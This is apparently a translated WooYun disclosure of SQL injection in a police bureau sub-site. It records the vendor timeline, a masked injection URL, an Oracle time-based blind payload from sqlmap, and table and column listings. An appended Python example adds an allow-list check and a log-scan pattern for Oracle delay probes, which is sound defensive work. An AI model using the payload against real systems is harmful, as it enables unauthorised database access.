Vulnerability summary   Followers: 24
Defect ID: wooyun-2015-0146274
Title: SQL injection vulnerability in a sub-site of a municipal Public Security Bureau
Related vendor: 公安部一所 (First Research Institute of the Ministry of Public Security)
Author: 隔壁老三
Submitted: 2015-10-13 13:29
Fixed: 2015-11-30 22:08
Published: 2015-11-30 22:08
Vulnerability type: SQL injection
Severity: Medium
Self-assessed Rank: 10
Status: handed over to a third-party partner organisation (公安部一所) for handling
Source: http://www.wooyun.org; for questions or help, contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2015-10-13: details sent to the vendor, awaiting vendor handling
2015-10-16: vendor confirmed; details visible to the vendor only
2015-10-26: details opened to core white hats and domain experts
2015-11-05: details opened to regular white hats
2015-11-15: details opened to intern white hats
2015-11-30: details opened to the public
Brief description:
SQL injection
Detailed description:
Did not dig any deeper, to avoid getting a knock on the door.
Proof of vulnerability:
Injection point: http://**.**.**.**/zjlsga/cmsWebapp/zjls/jsp/wsbs/serviceSearch.jsp?deptUnid=6327FE43C41759B71D4BB9EF6C71F5DC
sqlmap identified the following injection points with a total of 94 HTTP(s) requests:
---
Place: GET
Parameter: deptUnid
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: deptUnid=6327FE43C41759B71D4BB9EF6C71F5D' AND 2555=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(65)||CHR(70)||CHR(74),5) AND 'PGCL'='PGCL
---
Database: ORACLE
[7 tables]
+----------------------+
| MSmerge_errorlineage |
| adminrights          |
| bestellung           |
| loginout             |
| mymps_news_img       |
| parts                |
| tbladmin             |
+----------------------+
Database: ORACLE
Table: TBLADMIN
[17 columns]
+------------------+-------------+
| Column           | Type        |
+------------------+-------------+
| authentication   | non-numeric |
| c_commu_topic_id | non-numeric |
| course_name      | non-numeric |
| dnum             | non-numeric |
| email            | non-numeric |
| gab_pergunta     | non-numeric |
| index_num        | non-numeric |
| indice_id        | non-numeric |
| lake_id          | non-numeric |
| menu             | non-numeric |
| orderno          | non-numeric |
| pass             | non-numeric |
| reddito          | non-numeric |
| source           | non-numeric |
| sub_image5       | non-numeric |
| uname            | non-numeric |
| user_login       | non-numeric |
+------------------+-------------+
Database: ADMINRIGHTS
[21 tables]
+-------------------------+
| CPG_filetypes           |
| Login                   |
| SUPPORT_INCIDENTS       |
| Volume                  |
| activity                |
| adminid                 |
| content                 |
| klassen                 |
| memberid                |
| notes                   |
| p0fs                    |
| partsvendor             |
| pass_hash               |
| plugin_sid              |
| rating_track            |
| sailors                 |
| spip_messages           |
| spip_versions_fragments |
| vcd_VcdToPornStudios    |
| warehouse               |
| zips                    |
+-------------------------+
Database: ADMINRIGHTS
Table: LOGIN
[15 columns]
+---------------------------+-------------+
| Column                    | Type        |
+---------------------------+-------------+
| app_id                    | non-numeric |
| att_codice                | non-numeric |
| blogpermissiongroup       | non-numeric |
| emri                      | non-numeric |
| grtov                     | non-numeric |
| loginrestrictedtonickname | non-numeric |
| magic                     | non-numeric |
| news_date                 | non-numeric |
| old                       | non-numeric |
| origin                    | non-numeric |
| rank_id                   | non-numeric |
| tempid                    | non-numeric |
| tempprovkredit            | non-numeric |
| wdatarow                  | non-numeric |
| xevento                   | non-numeric |
+---------------------------+-------------+
Fix recommendation:
You know what to do.
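As an added example (not part of the original report), a defender-side check in Python: the allow-list validation the deptUnid parameter should have had, plus a log scan that flags the Oracle time-based probe pattern visible in the sqlmap output above. The access-log layout, the assumption that a legitimate deptUnid is a 32-character hex identifier, and the sample log lines are all constructed for this example.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Assumption: a legitimate deptUnid is a 32-character uppercase hex identifier,
# matching the value in the report; anything else is rejected at the edge.
DEPT_UNID = re.compile(r"[0-9A-F]{32}")
# Oracle delay primitives used by time-based blind probes, including the
# DBMS_PIPE.RECEIVE_MESSAGE call visible in the report's sqlmap payload.
ORACLE_DELAY = re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE|DBMS_LOCK\.SLEEP", re.I)
# Combined log format with a trailing request-time field in seconds (assumed layout).
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) \S+" '
                      r'\d{3} \S+ (?P<secs>[\d.]+)$')

# Constructed sample lines: a normal request, the report's payload URL-encoded,
# and a malformed value with no delay primitive.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Oct/2015:13:20:01 +0800] "GET /zjlsga/cmsWebapp/zjls/jsp/wsbs/serviceSearch.jsp?deptUnid=6327FE43C41759B71D4BB9EF6C71F5DC HTTP/1.1" 200 5120 0.031
10.0.0.9 - - [13/Oct/2015:13:21:07 +0800] "GET /zjlsga/cmsWebapp/zjls/jsp/wsbs/serviceSearch.jsp?deptUnid=6327FE43C41759B71D4BB9EF6C71F5D%27%20AND%202555%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%2865%29%7C%7CCHR%2870%29%7C%7CCHR%2874%29%2C5%29%20AND%20%27PGCL%27%3D%27PGCL HTTP/1.1" 200 5120 5.042
10.0.0.9 - - [13/Oct/2015:13:21:09 +0800] "GET /zjlsga/cmsWebapp/zjls/jsp/wsbs/serviceSearch.jsp?deptUnid=abc HTTP/1.1" 200 5120 0.020
"""

def is_valid_dept_unid(value: str) -> bool:
    """Allow-list check the JSP should apply before the value reaches any SQL."""
    return DEPT_UNID.fullmatch(value) is not None

def flag_request(line: str, slow_secs: float = 4.0) -> Optional[dict]:
    """Return a finding for a request whose deptUnid fails the allow-list or carries
    an Oracle delay primitive; None for a normal request or an unparsable line."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    values = parse_qs(urlsplit(m["target"]).query).get("deptUnid")
    if not values:
        return None
    value = values[0]  # parse_qs percent-decodes, so the probe is visible in clear
    reasons = []
    if not is_valid_dept_unid(value):
        reasons.append("deptUnid fails allow-list")
    if ORACLE_DELAY.search(value):
        reasons.append("oracle delay primitive in parameter")
    if reasons and float(m["secs"]) >= slow_secs:
        reasons.append("slow response consistent with time-based probe")
    return {"ip": m["ip"], "reasons": reasons} if reasons else None

def scan_log(text: str) -> list:
    """Run flag_request over every line and keep only the findings."""
    return [f for f in map(flag_request, text.splitlines()) if f]
```

Running `scan_log(SAMPLE_LOG)` flags the second and third lines only; the same allow-list check, applied server-side, would have stopped the injected value before it reached the query.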
Copyright notice: when reposting, credit the source: 隔壁老三@乌云
Vulnerability response
Vendor response:
Severity: Medium
Vulnerability Rank: 6
Confirmed at: 2015-10-16 22:06
Vendor reply:
Thanks for the submission!!
Verified the described issue; the site has been notified to fix it.
Latest status:
None yet